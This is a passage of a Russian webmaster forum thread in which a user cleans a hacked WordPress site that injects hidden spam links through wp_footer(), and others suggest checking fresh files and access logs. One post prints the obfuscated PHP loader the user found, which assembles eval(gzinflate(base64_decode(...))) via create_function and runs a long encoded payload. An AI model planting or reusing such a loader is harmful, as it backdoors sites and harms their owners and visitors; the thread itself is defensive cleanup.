Что за это будет?

12
J
На сайте с 08.06.2006
Offline
844
#11

Пароль сменил только что

Но сегодня с утра ничего нет (вчера почистил)

B
На сайте с 23.05.2001
Offline
195
#12
joost:
Пароль сменил только что
Но сегодня с утра ничего нет (вчера почистил)

После удаления вредоносного кода проверяйте сайт каждые 2-3 дня.

Если опять появится - смените хостинг.

Проверьте остальные сайты на этом же хостинге.

J
На сайте с 08.06.2006
Offline
844
#13
Basilisk:
После удаления вредоносного кода проверяйте сайт каждые 2-3 дня.
Если опять появится - смените хостинг.
Проверьте остальные сайты на этом же хостинге.

скрытые ссылки выводит wp_footer() в футере

его удалил - ничего не выводится

но вот сам код вывода кода и место подменны wp_footer() не могу найти

aship
На сайте с 20.10.2007
Offline
83
#14
joost:
что примерно писали?

---------- Добавлено 16.02.2013 в 03:49 ----------

именно wp_footer(); выводит скрытые ссылки
где найти код функции wp_footer();
смотрел в functions.php темы и движка - ничего подозрительного
смотрел general-template.php тоже ничего
где еще смотреть?

Поищите файлы и каталоги с очень свежей датой, сейчас софт пошел примитивный дату обычно не меняет.

Проверьте все, что нашли. Возможно вам повезет и среди этих файликов будет список того, что вам залили.

Потом открывайте лог и смотрите все запросы POST, возле этой даты.

Если увидите что-то чего не должно быть по логике, возможно это и есть запрос, который покажет вашу уязвимость.

Да, не сказал, запросы ищите в логе доступа.

Семинары За что Яндекс наказывает сайты, работа с ТИЦ, бюджетное продвижение сайтов (http://gurutalk.ru)... По фотографии не лечу.
J
На сайте с 08.06.2006
Offline
844
#15
<?php
$md5 = "1f81a6816f2dfbd7e2cc5a80f8ff4f00";
$ae = array("(",'$',"f",'d','a','b',"v",'n','e','s',';','c',"6",'l','4','z',"r",'i','g',")","_","o",'t');
$bef = create_function('$'.'v',$ae[8].$ae[6].$ae[4].$ae[13].$ae[0].$ae[18].$ae[15].$ae[17].$ae[7].$ae[2].$ae[13].$ae[4].$ae[22].$ae[8].$ae[0].$ae[5].$ae[4].$ae[9].$ae[8].$ae[12].$ae[14].$ae[20].$ae[3].$ae[8].$ae[11].$ae[21].$ae[3].$ae[8].$ae[0].$ae[1].$ae[6].$ae[19].$ae[19].$ae[19].$ae[10]);
$bef('DZRFDu0GAsCO01ZZhElVF8EXZt6Mwsyc088/gSVLdnmlw9/1107VkB7l31m6lwT2v6LM56L8+y8x8eF99+W6di2dhhobep9h6eDHdPRWGZKFpkD2bad5U9/L0JoJXLYFWeQOVCvNgDXmOi6/TD6/Ij/pwx3sh6JimiBbBX0o3mhd75TP6hA5FViBZ8pKv94xpSJpl0vdVlZ+49Sppv1o91Cc3Or824kVNcTU/lRpNdM2b8PmZZ4L1uMMbj2gqEf2zoEbfaVbrgUUMyKuNt507U0EZuXzM/9/VegMniq4PTNQ8ny+mw5+i1bu8USRdnxCx7vTS1ebaYCLNzflylwGpl8hZqCaCiv6d6dcwtMl7Lre3xRdhgy11tozf757ZVD89JAh50ku+HHc7WORSjxWie8gWDbTqbpe3LUhlZMXSrrKEoTxlCY0SzSZ7nnL/0B2zX6LrhUWWXfaNeaQiAm0NIQmzeqqqme4vcYuCtOKgoK6EwovIcy4UhFcjsaQMuilnB0iIWuOwL+qXoEg7yyDvb+xnuajfebDP8eCrD3rGS03SzTTtCu8DqmylYIKBxc9YBar2iO4BBr2X61SIdSwOMlVKaRJLykD27z/nKWszhbrPY3Dnq6iKH8TkgfXhAwDduuiN5qSStQzT8ZQImOfvUNckppgT+PiUOdxQ4MAPpBvXIPI0i+tO5fm3Yh0MpzsAEwJDVb/16ibrv35ipcWVGwHCnQOE7NDLMmbNJti9DT+/BIUDeMLa4IOL1fPsb4QkhvM83SezkMkGApGyY9/Rqvd7HtUzz5xoozfwPL3zUKBkVXAcx3TdDLvv2nTeCVIjAmzII8numt+sW2mheX1OMrakUuwy7n82M4DfnT8IgcWFHQ2b4iam9TheVm+4QpsA2hiSfxlOu6HtjPXTZeWM0OB4079rau0o7OJE6bJGCYgzf5WYnHBxkDw7LvZPw3ZC09/ihMc63DW6EIpimaL48pEyYgqShCoVXbQEGxfKsuxWveUOXAsY1lU4Hy5ZGLzpyiglfDpYaIXDYbptQPWmjTRqFXoweZeaDJWmFH80QEfhMQl5rrC3iDrAK/oK03b+GTYWfYM8qvy56wicZeAand
?>

Вроде нашол

---------- Добавлено 17.02.2013 в 00:30 ----------

вобщем по поиску по create_function('$' нашол много интересного

---------- Добавлено 17.02.2013 в 01:27 ----------

удалил

но проблема осталась

уже и не знаю что делать

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий